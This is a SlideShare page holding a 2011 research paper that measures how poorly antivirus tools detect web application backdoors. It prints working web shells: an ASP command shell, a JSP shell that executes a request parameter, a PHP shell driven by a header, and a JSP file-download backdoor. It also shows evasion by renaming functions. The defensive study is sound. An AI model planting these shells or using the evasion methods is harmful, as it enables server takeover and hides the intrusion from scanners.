A Garage for “Hackers and Security Professionals”    WEB APPLICATIO...                          A Garage for “Hackers and Security Professionals” Antivirus Detecti...                          A Garage for “Hackers and Security Professionals”File name: c99_loc...                          A Garage for “Hackers and Security Professionals”      Heuristics B...                            A Garage for “Hackers and Security Professionals”        // cmd.j...                            A Garage for “Hackers and Security Professionals”Test # 4.2      ...                           A Garage for “Hackers and Security Professionals”                 ...
http://www.Garage4Hackers.comA Garage for “Hackers and Security Professionals”
Upcoming SlideShare
Loading in …5

Effectiveness of AV in Detecting Web Application Backdoors


Published on

Effectiveness of AV in Detecting Web Application Backdoors by Rahul Sasi @ null Mumbai Meet in January, 2011

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Effectiveness of AV in Detecting Web Application Backdoors

  1. 1. A Garage for “Hackers and Security Professionals” WEB APPLICATION SECURITY instead take a look at the very common web application Backdoors that are Effectiveness of Antivirus in commonly used by hackers and how Antivirus being used widely on many Web Detecting Web Application Servers is incapable of detecting them. Backdoors [FB1H2S aka Rahul Sasi] http://garage4hackers.comAbstract: This paper gives detailed idea of Diagram - 001the effectiveness of Antivirus software’s in Normally an attack goes like Diagram 001,detecting various Web Application where attacker finds vulnerability in a hostedbackdoors that widely affect Web Servers. web application and he manages to upload aThe analysis would prove the inefficiency of malicious application backdoors in one of thecurrent Antivirus techniques in detecting servers supported languages, like Asp, Php,Web application backdoors and its, Jsp etc. And this gives him control overconsequences. the entire Web Server. Firewalls and Antivirus softwares are always part of a network. Firewalls are mostly not asked to monitor webIntroduction: Considering the increased traffic. So the only security measure the Web servers depend upon is the Antivirus. And wenumber of attacks on Web Applications and will go in detail analyzing common webdefacement statistics on Web Servers, it’s application backdoors and how AVs lack inhigh time to review the security of Web catching them.Servers and protection mechanism aided toprevent them. Zone-H report at saysthat the defacements count gets doubled everyyear. They also add that the methodologiesused to gain access are still the same“Application Layer Vulnerabilities”. Let’s notgo into application vulnerabilities but
  2. 2. A Garage for “Hackers and Security Professionals” Antivirus Detection Mechanisms and Test # 1.1 Where They Lack Objective: Test on an old and popular backdoor which proves that popularity matters for detectionSignature Based Detection Backdoor / File name: C99.phpIn this technique the Antivirus softwares need Description: A very old and widely usedto have the signature of the Backdoor, and for backdoor having. Great numbers of options arethat the companies should already have had a available. Born some 12 years ago. Signaturescopy of the backdoor for analyzing. are available with most of the AntivirusReasons behind ineffectiveness of “Signature software’s.Based” detection of Web Backdoors Analysis: Shows that 81% AVs detect the old 1) Signature based detection works fine man with self propagating worms as there File name: c99_locus7s.php mass spreading mechanism will some way make it to reach the AV companies Submission date: 2010-12-27 08:06:42 too. But that’s not the case with web Result: 34 /42 (81.0%) backdoors they don’t have any self spreading mechanism and as they are Test # 1.2 only targeted on a particular server and thus the most common Backdoors Objective: Prove that Signature based detection signature remains unknown is very easy to bypass when it comes to detect a web application backdoors as it’s based on 2) The signatures are not built based on strings. instructions like in PEs, but instead using strings and function calls. Simply Description: Web backdoor’s built-in scripting renaming a function call, string or languages are easy to bypass, the signatures are changing the order of the program can not build based on instructions like in PEs, but prove to be enough to bypass instead using strings and function calls. Simply “Signature Based Detection” approach renaming a function call or changing the order of the program would be enough to bypass AV.Note: Below given are some samples analyzed A second test was done by simply removing thefor example purpose. All the samples analyzed Change logs (Authors name and update logs)were downloaded form a collection of common from the top of the script and a reanalysisweb backdoors archive found on internet few showed that now only 27 AV detected ityears back, Virus Total was used for theanalysis.
  3. 3. A Garage for “Hackers and Security Professionals”File name: c99_locus7s.php File name: cmdasp.aspSubmission date: 2011-01-25 12:17:19 Submission date: 2011-01-25 19:33:07Result: 27 /43 (62.8%) Result: 35/ 43 (81.4%)Test #2.1 Test #3.2Objective: Test on an old and not so popular Objective: Signature based detection on Webbackdoor to prove that it’s really hard for web Application backdoors are easy to bypassapplication backdoors to reach AV vendor for Description: The above mentioned samplesignature building which contained some HTML CODE (just forDescription: Another sample was taken from formatting output) was edited in notepad andthe same web backdoor collection pretty old the HTML contents were stripped off leavingbut with less functionality, although enough to the actual backdoor code unhampered. Alsodeface a site functions were renamed and then backdoor was subjected to analysisAnalysis: Shows that only 2 AV detects thebackdoor. //html striped cmdasp.asp On Error Resume Next File name: AK-74 Security Team Web dim resp Shell Beta Version.php -- create the COM objects that we Submission date: 2011-01-25 17:33:25 will be using -- Result: 2/ 43 (4.7%) Set woot = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")Test # 3.1 resp = woot.Run ("cmd.exe /c " dir, 0, True)Objective: Signature based detection of Web Response.Write Server.HTMLEncode(resp)Application backdoors are easy to bypassDescription: A test on another old and popular Analysis: The analysis showed that striping ofbackdoor detected by all Av’s. And trying to useless plain HTML form the ASP code andmake it undetectable by AVs. An Active Server renaming the function names made itPage’s simple command execute backdoor Undetectable by all the Avs while still providingnamed cmdasp.asp was obtained from a very full functionalityold archive File name: test2.aspcompilation Submission date: 2011-01-25 19:57:03 Result: 0/ 43 (0.0%)Analysis: 81% of the AVs detected the scriptbecause of its popularity and availability ofsignature
  4. 4. A Garage for “Hackers and Security Professionals” Heuristics Based Detection For analyzing the above lets discuss on few common features of Web ApplicationNot many Antivirus vendors depend upon backdoors. As such a Web backdoor would haveheuristics for Web backdoor detection, only few some or all of the following features -prominent and leading Anti viruses employ thisdetection. 1) Execute System Commands On The Web ServerWhy heuristics based detection is not employed 2) Traverse Directories And View/Edit Fileswhen it comes to Web Application And Programs 3) Upload Feature – Helpful In Local 1) Heuristics detection based on dynamic Privilege Escalation analysis and is always considered risky 4) Download Documents And File as the chances of false positives are 5) Registry Editing very high, and when it comes to Web 6) Execute A Reverse Connect, Bind Shell Application, risk is pretty high 7) Database Management 2) Web Application undergoes updates A Web backdoor with the first feature [Execute and changes frequently comparing PE commands] would itself be capable enough to files, and methodologies used for PE perform the rest of the features, in one way or detection could not be fully utilized other. So let’s further discuss on that. here Command execution is possible with almost all scripting languages if certain default functions 3) Executables could be added with a are not disabled on the environment depending legitimate sign in case of PEs but that’s upon the language. not possible with Web Scripts And except [1], [6] and [7] the rest all are 4) Static analysis on PE, based on few legitimate Web Application behaviors, so there critical and exceptional APIs could be is great possibility of getting detected. used for static heuristic detection. But Test # 4.1 in Web Application one flagging on such a function call would make a legitimate Objective: Testing simple command execution code black listed Backdoor in JSP, PHP using default system command execution functions and analyzing 5) Dynamic analysis at runtime is not used the efficiency of Antivirus in static heuristic on scripting languages as the codes are detection interpreted Command Execution shell in .Jsp that could be 6) Threat classification and Risk Analysis compiled to .war java web archive format. for Web Application is hard to automate
  5. 5. A Garage for “Hackers and Security Professionals” // cmd.jsp <%@ page import="java.util.*,*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>Analysis: No Antivirus detected it File name: cmd.jsp Submission date: 2011-01-25 21:32:32 (UTC) Result: 0/ 43 (0.0%)
  6. 6. A Garage for “Hackers and Security Professionals”Test # 4.2 a runtime analysis is performed. And hence lack of detection is observed.Objective: Command Execution shell in PHPwhich could be added to an already existing Code: Download File from serverPHP file and could process request via User- // Download_file.jsp by fb1h2sAgent header <%@ page import="java.util.*,*"%><% File f = new File <?php (request.getParameter("d")); passthru(getenv("HTTP_ACCEPT_LANGUAGE")) response.setContentType ("application/ear");response.setHeader ; echo <br> Fb1h2s; ?> ("Content-Disposition", "attachment; filename="fb1h2s.bak""); InputStream in = newAnalysis: No Antivirus detected it FileInputStream(f);ServletOutputStream outs = response.getOutputStream();int bit = 2555555;int i = 0;while ((bit) >= File name: accept_lanaguage.php 0){bit = Submission date: 2011-01-25 21:36:20;outs.write(bit);}outs.flush() (UTC) ;outs.close();in.close();%> Result: 0/ 43 (0.0%)The above analysis shows that even though thegetRuntime().exec and passthu() functions were Analysis: No antivirus scanners detected itpresent in the code the static analysis of the [Static and heuristics scan] in efficiency ofAVs were not able to detect those critical detecting web backdoors at runtime. The abovefunction calls. program is a threat, and these kinds ofThreat classification and Risk Analysis for Web backdoors are hard to detect by automatedApplication is hard to automate. It’s hard to AVs, unless there is a policy created for files anddetect which piece of code is legitimate and folders regarding accessibilitywhich one is not. Consider the following tests File name: download_jsp.warTest #4.3 Submission date: 2011-01-26 3:36:20 Result: 0/ 43 (0.0%)Objective: Classifying a threat. Run timeanalysis is not possible on Web BackdoorsDescription: Below given is a simple program inJSP that could download files from the server.Downloading a file from web server is alegitimate activity and cannot be used as areason for heuristic detection. But what if theprogram tries to download a configuration file,or other critical files from the server. Thesekinds of backdoors could not be detected unless
  7. 7. A Garage for “Hackers and Security Professionals” d96e8606c79b0e76b6a2ce040395e775cb4da86- 1294670298Conclusion:Web applications and environments hosting isgrowing rapidly and the necessity of providingimproved security increases. The in efficiency of Test #3.2current Antivirus software’s in detecting WebApplication backdoors is proved to be These factors add up to need of scan/report.html?id=1b686ac4c7ffca2e546e3c82d0 b9012109f74d72f957615395b043923b83054e-Antivirus vendors become apprised of Web 1295374370Back Door and improved specialized detectiontechniques. And also advises Web Server Test # 4.1administrators not to fully depend on native for preventing Web intrusions. scan/report.html?id=6c4ccd3589f1d64843e884382There are a handful of good Web Applications b448f03d1277317524fa45e06d519b4b9ed5dc0-specific firewalls out in market, which could 1295991152yield a satisfactory result. Test #4.2References and Appendix: # 1.1 scan/report.html?id=f1460fb9e543fb5d1ccc7eadad 05233a51fedb146c316017c31bf1856fd8f2a5- 1295949577scan/report.html?id=63d02e75b729e2cc17604235cf9c0b506b3ca5d578a8e32a0e85e28763ca25a6- Test #4.31293437202 #1.2 scan/report.html?id=092e2e97b33119a97441c2419 4c49bf75d3cec7371c42fb1f94e2ecaeb78d8c9- 1295936735scan/report.html?id=07623faf67eae7706dbe43bf45f383a1c19b6ab81dbc941ea7e47030412c7166- An archive of Codes and analyses could be1295957839 found from here:Test #2.1 hp?723-Effectiveness-of-Antivirus-in-Detecting-scan/report.html?id=dc91561fd0b7a555e9e1a26fd Web-Application-Backdoorsd189d18832b9d896f50e7f8afa153773d1a851c-1295976805Test #3.1
  8. 8. http://www.Garage4Hackers.comA Garage for “Hackers and Security Professionals”